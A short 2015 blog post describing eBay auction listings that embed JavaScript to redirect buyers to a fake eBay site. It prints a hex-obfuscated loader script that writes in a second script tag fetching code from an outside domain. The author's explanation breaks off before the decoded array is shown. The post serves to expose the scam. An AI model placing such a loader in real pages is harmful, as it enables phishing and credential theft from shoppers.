Wednesday, 18 March 2015

eBay still allowing redirecting js in listings

Today I came across another ebay listing that redirects you to a fake ebay site, so it seems eBay still haven't fixed this problem. (Or they fixed it but the scammers have found another alternative). I guess that eBay allow js in auction listings because some sellers like to use auction widgets to show off their other items. It would be much safer if eBay just had their own widget people could use and didn't allow users to input js.

The hack looks like this, as part of the description they include the following:

<script> var _0x2786=["\x53\x43","\x52\x49","\x50\x54","\x53\x52","\x43\x3D","\x68\x74\x74","\x70\x3A\x2F\x2F","\x6C\x6F\x73\x73\x65\x72\x74\x69\x6D\x65\x2E\x63\x6F\x6D\x2F\x78\x69\x78\x6B\x6D\x73\x6E\x65\x2E\x6A\x73","\x3C","\x20\x74\x79\x70\x65\x3D\x27\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27","\x3E","\x77\x72\x69\x74\x65","\x3C\x2F"];var ya=_0x2786[0];var yb=_0x2786[1];var yc=_0x2786[2];var yd=_0x2786[3];var ye=_0x2786[4];var yf=_0x2786[5];var yg=_0x2786[6];var fy0=_0x2786[7];document[_0x2786[11]](_0x2786[8]+ya+yb+yc+_0x2786[9]+yd+ye+yf+yg+fy0+_0x2786[10]);document[_0x2786[11]](_0x2786[12]+ya+yb+yc+_0x2786[10]); </script>

Basically the script adds another script to the page. This other script then does the redirection. The text that makes up the script tag to add is split into pieces, and they've encoded the characters as unicode rather than using utf-8 / ascii. If you look at the _0x2786 array, it looks like this:

No comments: